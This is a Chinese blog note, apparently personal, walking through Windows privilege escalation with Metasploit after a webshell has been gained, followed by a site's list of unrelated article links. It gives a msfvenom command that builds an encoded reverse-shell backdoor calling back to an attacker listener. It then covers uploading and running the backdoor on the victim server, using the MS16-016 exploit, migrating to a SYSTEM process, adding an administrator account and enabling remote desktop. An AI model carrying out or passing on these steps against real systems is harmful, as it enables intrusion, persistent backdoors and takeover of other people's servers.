用MSF进行提权
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!
我们先用msfvenom生成一个EXE的木马后门。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -b '\x00' LHOST=192.168.1.7 LPORT= -f exe > abc.exe
然后在到MSF根据刚才配置的木马后门进行监听...
然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,
比如这里我吧abc.exe上传到了C:\users\leak\desktop\目录下,
abc.exe就是我刚才生成的后门。
然后在执行我们的后门,可以看见MSF弹回了一个session 1(会话连接)。
说明我们后门程序成功执行起来了,当然你也可以在webshell执行的,
但必须的有一点执行的权限哦。
getuid //可以看见我们的权限很低的,一般都是user权限的,
但也遇到过某些服务器执行后就直接是system最高权限。像这种我们就直接加用户啦。
这里我们是user权限,我们要把它提升到system权限。Windows最高权限。
接着我们输入命令
background //把你当前的metasploit shell转为后台执行。
search ms16 // 搜索关键字相关的漏洞
.....然后我选择了MS16-016这个漏洞在进行提权
use exploit/windows/local/ms16_016_webdav // 选择漏洞
show options //查看漏洞里边要设置的参数
可以看见只有一个SESSION参数要设置
set SESSION 1 // 设置会刚才我们后门连接的ID号 1
exploit //执行提权...
可以看见成功的吧漏洞利用到了PID为692的进程中...
虽然提权成功了 但你getuid下还是看见的是user权限
ps一下查看进程
根据刚才的提示找到PID 692的进程
可以看见确实是system权限
所以我们还要用到migrate 命令 //迁移到一个指定的进程ID。
migrate 692 //
在getuid下可以看见为system权限啦
提权成功了
既然有了system权限 那我们在添加账号hack
添加为管理员组
用Nmap扫下并没有开启远程登陆3389
run getgui -e //开启目标主机3389 貌似这条MSF命令只对2003的系统有效 执行几次都没成功
所以就用cmd命令开了3389端口
提权成功,登录服务器。。。。
简单的做个笔记,记性不好。
最新文章
- 日期关联取最近日期的SQL
- spark转换集合为RDD
- java中final注意的问题
- UI进阶 即时通讯之卸载Openfire
- iOS学习笔记:iOS核心动画中的常用类型
- HDU 2340 Obfuscation(dp)
- bzoj1001
- android114 c转换成c++
- HTML&;CSS基础学习笔记1.9-添加图片
- FormView分页显示数据的例子
- css基础和心得(一)
- Python(2)深入Python函数定义
- Linux文件名匹配和输出重定向--2019-4-24
- OS之进程管理---多线程模型和线程库(POSIX PTread)
- Linux命令-设置免密码登录
- ADB interface驱动
- luogu P4051 [JSOI2007]字符加密
- 非极大值抑制(NMS,Non-Maximum Suppression)的原理与代码详解
- mybatis 关联表心得
- nginx+lvs+keepalived安装
热门文章
- 【Win10 开发】读取PDF文档
- javascript运动系列第七篇——鼠标跟随运动
- Android 对程序异常崩溃的捕捉
- 【开源】OSharp框架解说系列(5.1):EntityFramework数据层设计
- MySQL学习笔记十二:数据备份与恢复
- geotrellis使用(八)矢量数据栅格化
- 行程编码(atoi函数)
- Kooboo CMS - @Html.FrontHtml().Meta()详解。
- 关于log4net日志的配置流程
- C#~异步编程再续~大叔所理解的并行编程(Task&;Parallel)